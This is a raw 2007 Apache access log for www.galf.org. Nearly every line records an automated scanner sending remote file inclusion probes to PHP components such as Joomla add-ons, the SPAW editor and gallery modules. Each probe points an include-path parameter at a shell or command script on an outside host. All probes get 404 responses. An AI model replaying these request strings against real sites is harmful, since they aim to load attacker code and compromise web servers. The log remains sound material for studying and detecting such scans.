64.38.59.34 - - [02/Sep/2007:17:00:31 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.59.34 - - [02/Sep/2007:17:00:31 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.178.170.124 - - [02/Sep/2007:17:00:44 -0700] "GET /logs/access_070827.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:17:01:15 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:17:01:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:17:01:16 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.59.34 - - [02/Sep/2007:17:01:17 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.176.210.52 - - [02/Sep/2007:17:06:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.176.210.52 - - [02/Sep/2007:17:06:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.17.100.88 - - [02/Sep/2007:17:12:48 -0700] "GET /logs/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [02/Sep/2007:17:12:48 -0700] "GET /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.59.34 - - [02/Sep/2007:17:13:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /logs/access_070611.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /logs/access_070611.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:01 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:15:17 -0700] "GET /logs/access_070618.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:16:46 -0700] "GET /logs/access_070618.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:17:18:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:17:18:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.79.169 - - [02/Sep/2007:17:19:05 -0700] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.79.169 - - [02/Sep/2007:17:19:06 -0700] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:17:21:13 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:17:21:14 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:21:23 -0700] "GET /logs/modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:21:24 -0700] "GET /modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.47.60.170 - - [02/Sep/2007:17:22:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [02/Sep/2007:17:22:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:22:26 -0700] "GET /logs/access_070611.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:22:26 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:22:26 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:24:02 -0700] "GET /logs/access_070618.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:24:40 -0700] "GET /logs/modify.php?dir_module=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:24:40 -0700] "GET /modify.php?dir_module=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.113.83.59 - - [02/Sep/2007:17:25:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:25:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:25:16 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:25:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.28.233.31 - - [02/Sep/2007:17:26:57 -0700] "GET /logs/modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.28.233.31 - - [02/Sep/2007:17:26:57 -0700] "GET /modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:27:15 -0700] "GET /logs/index.php?path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:27:16 -0700] "GET /index.php?path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:28:09 -0700] "GET /logs/access_070716.log/modify.php?dir_module=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:28:09 -0700] "GET /logs/access.log/modify.php?dir_module=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:28:36 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
195.113.83.59 - - [02/Sep/2007:17:28:36 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:29:45 -0700] "GET /logs/access_070618.log//modules/4nAlbum/public/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:29:45 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:29:45 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
195.113.83.59 - - [02/Sep/2007:17:30:07 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:30:13 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:30:33 -0700] "GET /logs/access_070611.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.246.35.79 - - [02/Sep/2007:17:30:33 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.246.35.79 - - [02/Sep/2007:17:30:33 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
88.84.142.91 - - [02/Sep/2007:17:31:34 -0700] "GET /logs/access_070716.log/index.php?get=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:31:34 -0700] "GET /index.php?get=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:31:34 -0700] "GET /logs/index.php?get=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:35:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:35:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:35:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:35:52 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:36:34 -0700] "GET /logs/index.php?path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:17:36:35 -0700] "GET /index.php?path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.35.79 - - [02/Sep/2007:17:39:50 -0700] "GET /logs/access_070618.log/modules/agendax/addevent.inc.php?agendax_path=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.154.246.87 - - [02/Sep/2007:17:40:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [02/Sep/2007:17:40:50 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [02/Sep/2007:17:40:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [02/Sep/2007:17:40:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.81.231 - - [02/Sep/2007:17:41:10 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.81.231 - - [02/Sep/2007:17:41:14 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:17:41:22 -0700] "GET /logs/access.log/index.php?get=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.138.106 - - [02/Sep/2007:17:42:46 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.138.106 - - [02/Sep/2007:17:42:47 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.133.244.140 - - [02/Sep/2007:17:43:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.133.244.140 - - [02/Sep/2007:17:43:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.170.97.200 - - [02/Sep/2007:17:44:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:44:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.90.251.169 - - [02/Sep/2007:17:49:05 -0700] "GET /logs//index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.90.251.169 - - [02/Sep/2007:17:49:05 -0700] "GET //index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.193.162 - - [02/Sep/2007:17:49:30 -0700] "GET /logs//index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.193.162 - - [02/Sep/2007:17:49:30 -0700] "GET //index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.109.6 - - [02/Sep/2007:17:49:57 -0700] "GET /logs//index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:49:57 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:49:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.109.6 - - [02/Sep/2007:17:49:57 -0700] "GET //index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:51:29 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.170.97.200 - - [02/Sep/2007:17:51:29 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.170.97.200 - - [02/Sep/2007:17:51:30 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:52:04 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:52:04 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:52:05 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:52:42 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:52:45 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.234.248.64 - - [02/Sep/2007:17:53:44 -0700] "GET /logs//index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.234.248.64 - - [02/Sep/2007:17:53:44 -0700] "GET //index1.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:54:10 -0700] "GET /logs/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:54:10 -0700] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:54:17 -0700] "GET /logs/access_070716.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:17:54:36 -0700] "GET /logs/index.php?action=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:17:54:36 -0700] "GET /index.php?action=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:56:31 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:17:56:48 -0700] "GET /logs/access_070716.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.79.162.162 - - [02/Sep/2007:17:59:05 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:59:05 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:17:59:05 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.233.186 - - [02/Sep/2007:17:59:06 -0700] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.233.186 - - [02/Sep/2007:17:59:07 -0700] "GET //include/wysiwyg/spaw_control.class.php?spaw_root=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:18:00:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.79.162.162 - - [02/Sep/2007:18:00:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:18:02:00 -0700] "GET /logs/index2.php?url_page=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:18:02:00 -0700] "GET /index2.php?url_page=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:18:04:22 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [02/Sep/2007:18:04:22 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.79.162.162 - - [02/Sep/2007:18:04:22 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.28.220 - - [02/Sep/2007:18:05:16 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.10.138.106 - - [02/Sep/2007:18:06:00 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.138.106 - - [02/Sep/2007:18:06:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.138.106 - - [02/Sep/2007:18:07:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.138.106 - - [02/Sep/2007:18:07:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:18:09:28 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
